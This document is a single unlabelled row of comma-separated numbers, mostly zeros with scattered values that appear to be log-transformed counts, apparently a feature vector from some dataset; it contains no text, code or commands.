0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 5.101797476893978, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 3.1354942159291497, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.9444389791664403, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.833213344056216, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.302585092994046, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 3.4825185607408002, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 5.16396083649347, 0, 0, 0.0, 0.0, 0.0, 2.1972245773362196, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 3.367295829986474, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.295836866004329, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 5.111987788356544, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 5.101797476893978, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 7.917171988845775, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 2.833213344056216, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 2.8398715690385097, 0.0, 0.0, 0.0, 0.0, 0.0, 5.346437018291705, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 8.215149976722676, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 3.0841946160253877, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 11.08366673682469, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 2.4849066497880004, 2.0794415416798357, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.3978952727983707, 0.0, 0.0, 0.0, 0.0, 5.780743515792329, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 1.7412592803704001, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.70805020110221, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 5.41610040220442, 0, 0.0, 0.0, 4.581130849408909, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 2.550898738446989, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.044522437723423, 0.0, 0, 0.0, 2.550898738446989, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.991464547107983, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.605170185988092, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 7.869976334119211, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 4.330733340286331, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 2.995732273553991, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 4.897839799950911, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 3.044522437723423, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 4.748123315783208, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.182806904693497, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 2.772588722239781, 0, 0.0, 0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.302585092994046, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0, 0.0, 0, 4.454347296253507, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 